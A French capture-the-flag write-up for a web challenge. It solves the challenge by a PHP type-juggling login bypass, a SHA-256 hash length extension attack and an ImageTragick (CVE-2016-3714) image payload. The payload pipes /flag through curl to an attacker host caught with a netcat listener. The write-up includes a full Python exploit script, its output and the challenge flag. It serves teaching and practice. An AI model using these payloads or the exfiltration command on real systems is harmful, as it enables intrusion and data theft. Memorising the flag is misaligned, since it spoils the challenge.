# King secret's

## Consignes :

```
Nous avons développé des outils pour notre usage exclusif, merci de vous assurer qu'ils soient bien sécurisés.

Url du challenge : http://game1.marshack.fr:8087

```

## Pièce jointe :

Néant

## Serveur :
```
Docker
```

## Points attribués :

```
30/100
```

## Flag :

```
fl@g{4c96b9e2b5a0a39de2f0d750aa8173f2}
```

## Déroulé : 

Le challenge se compose de 3 étapes : 

    1- Contournement du formulaire de connexion en utilisant la méthode PHP juggling 
    2- Forçer l'upload en utilisant l'attaque Hash Length Extension
    3- Exploitation d'une vulnérabilité de Imagemagick appelé ImageTragick(CVE-2016-3714) permettant une RCE lors de l'upload de l'image.


## Détail

1- PHP juggling

Erreur de programmation dans le code qui contrôle la saisie utilisateur ( == ):

```
if(strcmp("LOoosve_Th_ee_ee_Waasay_Yo_u_hackssss$$", $pass) == 0 && strcmp("admin_IiIsssIIIiiIII_!(-?_?-)!_", $user) == 0 ){
```

Afin d'exploiter cette faiblesse, on soumet en méthode POST un tableau vide pour chaque variable ($pass et $user).

```
data = [
  ('user[]', ''),
  ('pass[]', ''),
]
```

2- Hash length Extension Attack (HLA)

Code vulnérable:


```php
elseif ( (strpos($action, 'upload') !== false) && $sig === hash("sha256", $secret . $action)) {
```

L'analyse de ce code permet de s'orienter vers une attaque de type HLA, la méthode de calcul du hash nous mène vers cette piste.

De plus, le test sur le contenu de la variable $action n'est pas effectuée dans les règles de l'art.

On aurait dû trouver par exemple:

```php
elseif ($action === "upload" && $sig === hash("sha256", $secret . $action)) {
```

Une des problématiques du HLA est la méconnaissance de la longueur du secret, il faut donc procéder par essai successif, afin de la déterminer.
Dans l'exploit fournie plus bas, on défini un range de 4 à 10, ce qui permet de tester plusieurs longueurs de secret. 

Extrait de l'exploit python qui permet de construire le payload et de l'envoyer sur la victime 

```python
append = 'upload'

for i in range(4, 11):

    sha = hlextend.new('sha256')
    hla = sha.extend(append, 'show', i, sig, True)
    urldata = {'action': hla,'sig':sha.hexdigest()}
    data = urllib.urlencode(urldata)

    url = 'http://game1.marshack.fr:8087/upload_file_dst.php?%s' % (data)

    resp = s.get(url,headers=headers).content
```

3- ImageMagick Exploit

IL faut ensuite créer le fichier image contenant les commandes Imagemagick permettant la RCE.

Création du fichier vul.jpg
```bash
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com"|cat /flag | curl http://<adresse_IP_Attaquant>:<Port_Attaquant> -d @- > /dev/null")'
pop graphic-context
```

Remarque:
- `https://example.com` : Le champ url doit exister mais on peut saisir n'importe quoi, cela n'influe pas sur l'exploit.
- `http://<adresse_IP_Attaquant>:<Port_Attaquant>` : Afin de récupérer le retour de la RCE, bien penser à mettre un netcat en écoute sur la machine de l'attaquant
  Ex: ``` nc -lnvp <Port_Attaquant_en_ecoute> ```

## Poc d'exploit

Atention: Version Python 2.7

Prérequis:

- Module Pure Python Hash Length Extension (HLExtend) : https://github.com/stephenbradshaw/hlextend

Le script python ci-dessous permet de résoudre le challenge : 

```python
from bs4 import BeautifulSoup
import requests
import time
import sys
import hlextend
import urllib
import urllib2
import re


s = requests.session()

data = [
  ('user[]', ''),
  ('pass[]', ''),
]
print "[+]Start exploit :D ! - make sure webhook link is good on vul.jpg file- "


toolbar_width = 20
sys.stdout.write("[%s]" % (" " * toolbar_width))
sys.stdout.flush()
sys.stdout.write("\b" * (toolbar_width+1))

for i in xrange(toolbar_width):
    time.sleep(0.1)
    sys.stdout.write("-")
    sys.stdout.flush()

sys.stdout.write("\n")

response = s.post('http://game1.marshack.fr:8087/index.php', headers=headers,data=data).content

if "Admin" in response:
    print "\n[1]Login bypass done!"


html_page = s.get("http://game1.marshack.fr:8087/upload_file_dst.php",headers=headers).content
soup = BeautifulSoup(html_page)

'''exploit HLA '''
last_href = soup.findAll('a')[-1]
sig = last_href.get('href').split("sig=")[1]
append = 'upload'

for i in range(4, 11):

    sha = hlextend.new('sha256')
    hla = sha.extend(append, 'show', i, sig, True)
    urldata = {'action': hla,'sig':sha.hexdigest()}
    data = urllib.urlencode(urldata)

    url = 'http://game1.marshack.fr:8087/upload_file_dst.php?%s' % (data)

    resp = s.get(url,headers=headers).content
    if 'Ready' in resp:
        print "\n[2]HLA bypassed!"
        print "     [*]Secret length : "+str(i)
        print "     [*]Full url exploit : %s" % url

    files = {'file_upload': open('vul.jpg','rb')}
    resp = s.post(url, files=files,headers=headers).content
    if "successfully" in resp:
        print "\n[3]Exploit imagemagick done!"

print "\n[4]Check your webhook to get flag!"

```


L'image permettant d'utiliser l'exploit imagemagick contient le code suivant :

```
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com"|cat /flag | curl http://<adresse_IP_Attaquant>:<Port_Attaquant> -d @- > /dev/null")'
pop graphic-context
```

Se mettre en écoute avec netcat pour récupérer le retour de la RCE

```bash
$ nc -lvnp 1337
```

Lancez le script d'exploitation exploit.py (python2.7)


```bash
[+]Start exploit :D ! - make sure webhook link is good on vul.jpg file- 
[--------------------]
<RequestsCookieJar[<Cookie PHPSESSID=hf373mkitmrrfnf4ipo03obf2a for 192.168.0.42/>]>
('PHPSESSID', 'hf373mkitmrrfnf4ipo03obf2a')
PHPSESSID
hf373mkitmrrfnf4ipo03obf2a

[1]Login bypass done!

[2]HLA bypassed!
     [*]Secret length : 8
     [*]Full url exploit : http://192.168.0.42:8087/

```

On peut constater que l'on récupère bien le flag.

```bash
listening on [any] 1337 ...
connect to [192.168.0.42] from (UNKNOWN) [10.201.16.2] 46734
POST / HTTP/1.1
Host: 192.168.0.42:1337
User-Agent: curl/7.68.0
Accept: */*
Content-Length: 38
Content-Type: application/x-www-form-urlencoded

fl@g{4c96b9e2b5a0a39de2f0d750aa8173f2}
```

